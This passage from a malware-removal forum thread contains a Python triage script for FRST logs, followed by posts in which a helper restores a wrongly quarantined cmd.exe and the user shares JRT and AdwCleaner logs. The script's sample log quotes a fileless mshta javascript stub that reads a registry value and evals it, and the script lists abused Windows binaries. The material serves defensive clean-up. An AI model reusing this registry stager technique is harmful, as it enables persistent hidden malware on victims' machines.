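reports what each one implies for clean-up. The names Finding, triage and
LOLBINS and the random-hex-name heuristic are this example's own assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sample: lines copied from the FRST fixlist and Addition.txt posted above.
SAMPLE_LOG = r"""
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [**rplp<*>] => "C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a898e3.lnk [2016-08-02]
ShortcutTarget: a898e3.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dff6bb.lnk [2016-08-02]
ShortcutTarget: dff6bb.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Classes\5e097f: "C:\Windows\system32\mshta.exe" "javascript:oB2RUH="oGt";mN71=new ActiveXObject("WScript.Shell");unRi22V="qmhHM";w0TVp=mN71.RegRead("HKCU\\software\\jiun\\thufoby");sh9jvJ="vImph";eval(w0TVp);z83FTbxB="RntD";" <===== ATTENTION
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.
"""

# Signed Windows binaries routinely abused as stage loaders (living off the land).
LOLBINS = {"cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "rundll32.exe", "regsvr32.exe"}

RUN_RE = re.compile(r"\\Run: \[(?P<name>[^\]]*)\] => (?P<target>.*?)(?: <=+ ATTENTION.*)?$")
LNK_RE = re.compile(r"^ShortcutTarget: (?P<lnk>\S+) -> (?P<target>.+?)(?: \([^)]*\))?$")
CLASSES_RE = re.compile(
    r'^(?P<key>HK[^:]*\\Classes\\[^:]+): "(?P<exe>[^"]+)" "(?P<arg>javascript:.*)"(?: <=+ ATTENTION.*)?$')
REGREAD_RE = re.compile(r'RegRead\("([^"]+)"\)')
CI_RE = re.compile(r"Code Integrity is unable to verify the image integrity of the file (?P<path>\S+)")
HEXNAME_RE = re.compile(r"^[0-9A-Fa-f]{6,8}$")   # heuristic (assumption): machine-generated driver names


def basename(path: str) -> str:
    """Last component of a Win32 or NT object path."""
    return path.rsplit("\\", 1)[-1]


@dataclass
class Finding:
    kind: str
    detail: str
    cleanup: List[str] = field(default_factory=list)   # artefacts a fix must also remove


def triage(log_text: str) -> List[Finding]:
    findings: List[Finding] = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue

        m = RUN_RE.search(line)
        if m:
            name, target = m.group("name"), m.group("target").strip('"')
            reasons = []
            if "invalid characters" in line:
                reasons.append("FRST flags non-addressable characters in the value name")
            if target.lower().endswith(".lnk"):
                reasons.append("Run value starts a shortcut, not a program")
            if reasons:
                findings.append(Finding("run-value", f"[{name}] -> {target}: " + "; ".join(reasons), [target]))
            continue

        m = LNK_RE.match(line)
        if m:
            exe = basename(m.group("target"))
            if exe.lower() in LOLBINS:
                # The signed binary is not the problem; the .lnk is the artefact to remove.
                # Moving the target itself is what broke cmd.exe in the fixlog above.
                findings.append(Finding("startup-lolbin", f"{m.group('lnk')} -> {exe}", [m.group("lnk")]))
            continue

        m = CLASSES_RE.match(line)
        if m:
            arg, cleanup, stage2 = m.group("arg"), [m.group("key")], None
            rr = REGREAD_RE.search(arg)
            if rr:
                # The stub only reads and evals; the real script lives in this registry value,
                # so its parent key has to go too (the fixlist's REG DELETE of HKCU\SOFTWARE\jiun).
                stage2 = rr.group(1).replace("\\\\", "\\")
                cleanup.append(stage2.rsplit("\\", 1)[0])
            findings.append(Finding(
                "mshta-registry-stager",
                f"{basename(m.group('exe'))} javascript: stub; RegRead({stage2}) eval={'eval(' in arg}",
                cleanup))
            continue

        m = CI_RE.search(line)
        if m:
            driver = basename(m.group("path"))
            if HEXNAME_RE.match(driver.rsplit(".", 1)[0]):
                findings.append(Finding("unverifiable-driver",
                                        f"{driver}: random hex name and no per-page hashes", [m.group("path")]))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.kind:24} {f.detail}")
        for item in f.cleanup:
            print(f"{'':24}   remove: {item}")
```

Two caveats the thread itself illustrates. The fixlog shows that putting ShortcutTarget lines in a fixlist made FRST move the signed binaries they point to, which is why JRT stopped working until cmd.exe was restored in post #8; the script therefore lists the .lnk, never its target, as the thing to remove. And the logs say this is 32-bit Vista, where kernel-mode code signing is not enforced, so the Code Integrity event is informational: the randomly named driver loaded anyway, and it is worth pulling for analysis rather than just noting.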



#8 Aura (Malware Response Team)

Posted 03 August 2016 - 07:02 AM

JRT is probably not working because the fix I gave you mistakenly quarantined CMD.exe (it's my fault). Follow the instructions below please.

Farbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Right-click on your Desktop, select New and click on Text Document. Name it fixlist (make sure it's a .txt file) and press Enter;
  • Open the file you just created and copy/paste the content below in it, then save it (Ctrl + S);
    CloseProcesses:
    
    RestoreQuarantine: C:\FRST\Quarantine\C\Windows\System32\cmd.exe.xBAD
    RestoreQuarantine: C:\FRST\Quarantine\C\Windows\System32\mshta.exe.xBAD
    
  • Right-click on the FRST executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;



#9 vistanovice (Topic Starter)

Posted 03 August 2016 - 08:33 AM

Ok, here we go - logs from the 3 programs - just a reminder that I couldn't find Quickshare to uninstall. I also want to uninstall IE but cannot find it among programs to uninstall.

Thanks.

Fix result of Farbar Recovery Scan Tool (x86) Version: 27-07-2016
Ran by Scott (2016-08-03 08:51:25) Run:2
Running from C:\Users\Scott\Desktop
Loaded Profiles: Scott (Available Profiles: Scott)
Boot Mode: Normal

==============================================

fixlist content:
*****************
CloseProcesses:

RestoreQuarantine: C:\FRST\Quarantine\C\Windows\System32\cmd.exe.xBAD
RestoreQuarantine: C:\FRST\Quarantine\C\Windows\System32\mshta.exe.xBAD
*****************

Processes closed successfully.
RestoreQuarantine: C:\FRST\Quarantine\C\Windows\System32\cmd.exe.xBAD=> Restoring from Quarantine completed.
RestoreQuarantine: C:\FRST\Quarantine\C\Windows\System32\mshta.exe.xBAD=> Restoring from Quarantine completed.


The system needed a reboot.

==== End of Fixlog 08:51:26 ====

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.7 (07.03.2016)
Operating System: Windows Vista ™ Home Premium x86
Ran by Scott (Administrator) on Wed 08/03/2016 at  9:09:26.18
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 0




Registry: 0





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 08/03/2016 at  9:11:20.37
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# AdwCleaner v5.201 - Logfile created 03/08/2016 at 09:19:35
# Updated 30/06/2016 by ToolsLib
# Database : 2016-08-02.3 [Server]
# Operating system : Windows Vista ™ Home Premium Service Pack 2 (X86)
# Username : Scott - 45TH
# Running from : C:\Users\Scott\Desktop\AdwCleaner.exe
# Option : Clean
# Support : https://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

[-] Folder Deleted : C:\Users\Scott\AppData\Local\jZip

***** [ Files ] *****

[-] File Deleted : C:\Program Files\Mozilla Firefox\browser\searchplugins\Ask.xml

***** [ DLLs ] *****


***** [ WMI ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****

[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{425E7597-03A2-338D-B72A-0E51FFE77A7E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{915BB7D5-082E-3B91-B1E0-45B5FDE01F24}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{2009AF2F-5786-3067-8799-B97F7832FDD6}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Record\{FB2E65F4-5687-33EF-9BBF-4E3C9C98D3B9}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppPath\jZip.exe
[-] Key Deleted : HKLM\SOFTWARE\Google\Chrome\NativeMessagingHosts\com.apn.native_messaging_host_aaaaafeopjhkcolncjbedbhofpocmdbn
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\jZipShell.DLL
[-] Value Deleted : HKLM\SOFTWARE\RegisteredApplications [jZip]
[-] Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\aaaaafeopjhkcolncjbedbhofpocmdbn
[-] Key Deleted : HKLM\SOFTWARE\Classes\GameTreatWidget.GameTreatWidget.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\jZip.file
[-] Key Deleted : HKLM\SOFTWARE\Classes\jZipShell.jZipShellExt
[-] Key Deleted : HKLM\SOFTWARE\Classes\jZipShell.jZipShellExt.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\SelectionLinksv4.SelectionLinksBHO
[-] Key Deleted : HKLM\SOFTWARE\Classes\SelectionLinksv4.SelectionLinksBHO.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar
[-] Key Deleted : HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\YMERemote.YMERemoteCtl
[-] Key Deleted : HKLM\SOFTWARE\Classes\YMERemote.YMERemoteCtl.1
[-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\{3ED98568-A949-49CB-8ED0-3A703F6D4166}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{44D07CAA-4FC4-5A84-9951-A485AD808D0E}
[-] Key Deleted : HKCU\Software\APNDTX
[-] Key Deleted : HKCU\Software\jZip
[-] Key Deleted : HKLM\SOFTWARE\jZip
[-] Key Deleted : HKLM\SOFTWARE\Yahoo\Companion
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\imeshjzipmusictoolbarIE
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\jZip
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\MyPC Backup

***** [ Web browsers ] *****


*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [3018 bytes] - [03/08/2016 09:19:35]
C:\AdwCleaner\AdwCleaner[R0].txt - [17486 bytes] - [13/02/2006 01:46:08]
C:\AdwCleaner\AdwCleaner[S0].txt - [17410 bytes] - [13/02/2006 01:48:36]
C:\AdwCleaner\AdwCleaner[S1].txt - [3638 bytes] - [03/08/2016 09:15:46]

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [3312 bytes] ##########
 



#10 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  • Gender:Male
  • Local time:03:09 PM

Posted 03 August 2016 - 08:39 AM

You cannot uninstall Internet Explorer since it's part of Windows, however you can disable it.

http://www.tomshardware.com/faq/id-2320344/disable-internet-explorer-windows-vista.html

As for Linkury, we'll address it after running a scan with Malwarebytes (because I think it targets it, so it might remove it).

Malwarebytes Anti-Malware - Clean Mode
  • Download and install the free version of Malwarebytes Anti-Malware
    Note: It's your choice if you want to enable the free trial of Malwarebytes Premium or not. Enabling it will give you real-time protection from the program, as well as access to all the Premium features.
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point;
  • Once Malwarebytes is installed, launch it and let it update its database. You might have to click on the Update Now button;
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan;
  • Let the scan run; the time required to complete the scan depends on your system and computer specs;
  • Once the scan is complete, make sure that the checkbox by Threat is checked (it means that every item detected is checked), then click on the Remove Selected button;
  • Click on Save Results after the deletion (in the bottom-right corner) and select Copy to clipboard. Paste the content in your next reply;

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#11 vistanovice

vistanovice
  • Topic Starter

  • Members
  • 66 posts
  • OFFLINE
  • Gender:Male
  • Local time:02:09 PM

Posted 03 August 2016 - 11:04 AM

I'll run Malwarebytes but wanted to let you know that as of now, about the only thing functioning on my machine is the ability to go online. I cannot load photos (need for online sales) and cannot use OpenOffice as files are coming up as corrupt & not repairable. Windows Photo Gallery is also partly inoperable as it says I don't have permission. There's also a problem accessing all my back-up files on the Toshiba drive - cannot open text files or images!!

 

Do you see these applications being restored? I'm feeling desperate. I'm a writer & sell online and my two avenues for doing both are both not working.



#12 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  • Gender:Male
  • Local time:03:09 PM

Posted 03 August 2016 - 11:06 AM

I have a small idea of what could cause these issues and how to solve them, though right now we need to make sure your system is clean before moving on, since malware can get in the way of our future repairs.

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#13 vistanovice

vistanovice
  • Topic Starter

  • Members
  • 66 posts
  • OFFLINE
  • Gender:Male
  • Local time:02:09 PM

Posted 03 August 2016 - 11:10 AM

I appreciate your confidence. I have books at risk. Losing them would be... can't think of a word to describe the feeling.


Edited by vistanovice, 03 August 2016 - 11:12 AM.


#14 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  • Gender:Male
  • Local time:03:09 PM

Posted 03 August 2016 - 11:28 AM

If you are afraid of losing your files, you should back them up before proceeding with the clean-up. Not only will it act as your safety if anything should happen, it's also one of the basics when it comes to practicing safe computing :)

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#15 vistanovice

vistanovice
  • Topic Starter

  • Members
  • 66 posts
  • OFFLINE
  • Gender:Male
  • Local time:02:09 PM

Posted 03 August 2016 - 01:07 PM

I have them backed up on the removable drive. This is the Toshiba drive I referred to.





